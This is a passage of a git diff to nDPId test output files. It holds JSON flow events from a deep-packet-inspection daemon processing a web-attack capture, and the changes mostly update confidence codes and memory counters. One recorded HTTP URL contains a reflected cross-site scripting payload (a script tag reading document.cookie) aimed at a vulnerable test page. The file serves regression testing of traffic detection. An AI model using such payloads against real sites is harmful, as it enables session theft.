-00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9146,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":532,"flow_state":"finished","flow_packets_processed":316,"flow_first_seen":1499347872187,"flow_last_seen":1499347941610,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1869,"flow_tot_l4_payload_len":232369,"flow_avg_l4_payload_len":735,"midstream":0,"thread_ts_msec":1499348070917,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33580,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9146,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":532,"flow_state":"finished","flow_packets_processed":316,"flow_first_seen":1499347872187,"flow_last_seen":1499347941610,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1869,"flow_tot_l4_payload_len":232369,"flow_avg_l4_payload_len":735,"midstream":0,"thread_ts_msec":1499348070917,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33580,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 
00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9146,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":568,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347936727,"flow_last_seen":1499347941876,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348070917,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34252,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9146,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":568,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347936727,"flow_last_seen":1499347941876,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348070917,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34252,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9146,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":570,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347940593,"flow_last_seen":1499347945883,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348070917,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34292,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
@@ -3731,7 +3731,7 @@ 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9152,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":646,"flow_packet_id":1,"flow_last_seen":1499348072088,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348072088,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8DYZAAD4GuEqsEAABwKgKMotUAFAOsRP1AAAAAKACchCRCQAAAgQFtAQCCAoBPR5zAAAAAAEDAwc="} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9153,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":646,"flow_packet_id":2,"flow_last_seen":1499348072088,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348072088,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQi1Q00\/Q8DrET9qAScSB1CgAAAgQFtAQCCAoD5u\/nAT0ecwEDAwc="} 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9154,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":646,"flow_packet_id":3,"flow_last_seen":1499348072089,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348072089,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0DYdAAD4GuFGsEAABwKgKMotUAFAOsRP2NNP0PYAQAOUUEgAAAQEICgE9HnMD5u\/n"} 
-01118{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9155,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":643,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499348068136,"flow_last_seen":1499348072090,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":585,"flow_tot_l4_payload_len":585,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1499348072090,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35626,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/?name=%3Cscript%3Econsole.log%28%27KGE8ES9SCQ7FORY5VSPTYY4R4UHJNRQTPTAY6L9JR1OU40RPDA%27%29%3Bconsole.log%28document.cookie%29%3B%3C%2Fscript%3E","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} +01118{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9155,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":643,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499348068136,"flow_last_seen":1499348072090,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":585,"flow_tot_l4_payload_len":585,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1499348072090,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35626,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 
{"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/?name=%3Cscript%3Econsole.log%28%27KGE8ES9SCQ7FORY5VSPTYY4R4UHJNRQTPTAY6L9JR1OU40RPDA%27%29%3Bconsole.log%28document.cookie%29%3B%3C%2Fscript%3E","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9162,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":647,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348073365,"flow_last_seen":1499348073365,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348073365,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35682,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9162,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":647,"flow_packet_id":1,"flow_last_seen":1499348073365,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348073365,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Pg1AAD4Gh8OsEAABwKgKMotiAFCjeCG\/AAAAAKACchDtKgAAAgQFtAQCCAoBPR+yAAAAAAEDAwc="} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9163,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":647,"flow_packet_id":2,"flow_last_seen":1499348073365,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348073365,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQi2IT1M33o3ghwKAScSAXMQAAAgQFtAQCCAoD5vEmAT0fsgEDAwc="} 
@@ -3856,7 +3856,7 @@ 00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":604,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347998605,"flow_last_seen":1499348003900,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34900,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":605,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348001148,"flow_last_seen":1499348006901,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34926,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":605,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348001148,"flow_last_seen":1499348006901,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34926,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":606,"flow_state":"finished","flow_packets_processed":311,"flow_first_seen":1499348002450,"flow_last_seen":1499348071824,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1869,"flow_tot_l4_payload_len":232355,"flow_avg_l4_payload_len":747,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34940,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":606,"flow_state":"finished","flow_packets_processed":311,"flow_first_seen":1499348002450,"flow_last_seen":1499348071824,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1869,"flow_tot_l4_payload_len":232355,"flow_avg_l4_payload_len":747,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34940,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 
00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":607,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348003742,"flow_last_seen":1499348008904,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34954,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":607,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348003742,"flow_last_seen":1499348008904,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34954,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":608,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348006334,"flow_last_seen":1499348011904,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34980,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
@@ -3929,7 +3929,7 @@ 00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":641,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348064243,"flow_last_seen":1499348069916,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35586,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":642,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348065546,"flow_last_seen":1499348070917,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35600,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":642,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348065546,"flow_last_seen":1499348070917,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35600,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00813{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":643,"flow_state":"finished","flow_packets_processed":133,"flow_first_seen":1499348068136,"flow_last_seen":1499348099366,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1869,"flow_tot_l4_payload_len":99154,"flow_avg_l4_payload_len":745,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35626,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00813{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":643,"flow_state":"finished","flow_packets_processed":133,"flow_first_seen":1499348068136,"flow_last_seen":1499348099366,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1869,"flow_tot_l4_payload_len":99154,"flow_avg_l4_payload_len":745,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35626,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 
00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":644,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348069426,"flow_last_seen":1499348074917,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35640,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":644,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348069426,"flow_last_seen":1499348074917,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35640,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":645,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348070791,"flow_last_seen":1499348075918,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35654,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
@@ -3966,7 +3966,7 @@ 00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":660,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1499348096595,"flow_last_seen":1499348096595,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35924,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":661,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1499348099359,"flow_last_seen":1499348099360,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35950,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":661,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1499348099359,"flow_last_seen":1499348099360,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35950,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":569,"flow_state":"finished","flow_packets_processed":311,"flow_first_seen":1499347939286,"flow_last_seen":1499348006339,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1870,"flow_tot_l4_payload_len":232672,"flow_avg_l4_payload_len":748,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34278,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":569,"flow_state":"finished","flow_packets_processed":311,"flow_first_seen":1499347939286,"flow_last_seen":1499348006339,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1870,"flow_tot_l4_payload_len":232672,"flow_avg_l4_payload_len":748,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34278,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 
00579{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","packets-captured":9374,"packets-processed":9374,"total-skipped-flows":0,"total-l4-payload-len":4091888,"total-not-detected-flows":0,"total-guessed-flows":639,"total-detected-flows":22,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":661,"total-idle-flows":661,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":3970,"global_ts_msec":1499348099366} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 9374/9374 @@ -3976,9 +3976,9 @@ ~~ total active/idle flows...: 661/661 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 6845697 bytes -~~ total memory freed........: 6845697 bytes -~~ total allocations/frees...: 130238/130238 +~~ total memory allocated....: 6979331 bytes +~~ total memory freed........: 6979331 bytes +~~ total allocations/frees...: 133000/133000 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 468 chars ~~ json string max len.......: 1123 chars diff --git a/test/results/afp.pcap.out b/test/results/afp.pcap.out index 47ea024d0..84bcead8d 100644 --- a/test/results/afp.pcap.out +++ b/test/results/afp.pcap.out 
@@ -2,10 +2,10 @@ 00543{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"afp.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1643275951277} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"afp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643275951277,"flow_last_seen":1643275951277,"flow_idle_time":7580000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":1,"thread_ts_msec":1643275951277,"l3_proto":"ip4","src_ip":"192.168.27.57","dst_ip":"192.168.27.139","src_port":64987,"dst_port":548,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"afp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1643275951277,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":88,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":88,"pkt_l4_len":54,"thread_ts_msec":1643275951277,"pkt":"ABxCVgfWYPgdrn1ECABFAABKAABAAEAGgpnAqBs5wKgbi\/3bAiR+nkVXU19RioAYCHEmJgAAAQEICtTtV\/gAQrf\/AAIixgAAAAAAAAAGAAAAABEAAAIOHA=="} 
-00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"afp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643275951277,"flow_last_seen":1643275951277,"flow_idle_time":7580000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":1,"thread_ts_msec":1643275951277,"l3_proto":"ip4","src_ip":"192.168.27.57","dst_ip":"192.168.27.139","src_port":64987,"dst_port":548,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"AFP","breed":"Acceptable","category":"DataTransfer"}} +00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"afp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643275951277,"flow_last_seen":1643275951277,"flow_idle_time":7580000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":1,"thread_ts_msec":1643275951277,"l3_proto":"ip4","src_ip":"192.168.27.57","dst_ip":"192.168.27.139","src_port":64987,"dst_port":548,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"AFP","breed":"Acceptable","category":"DataTransfer"}} 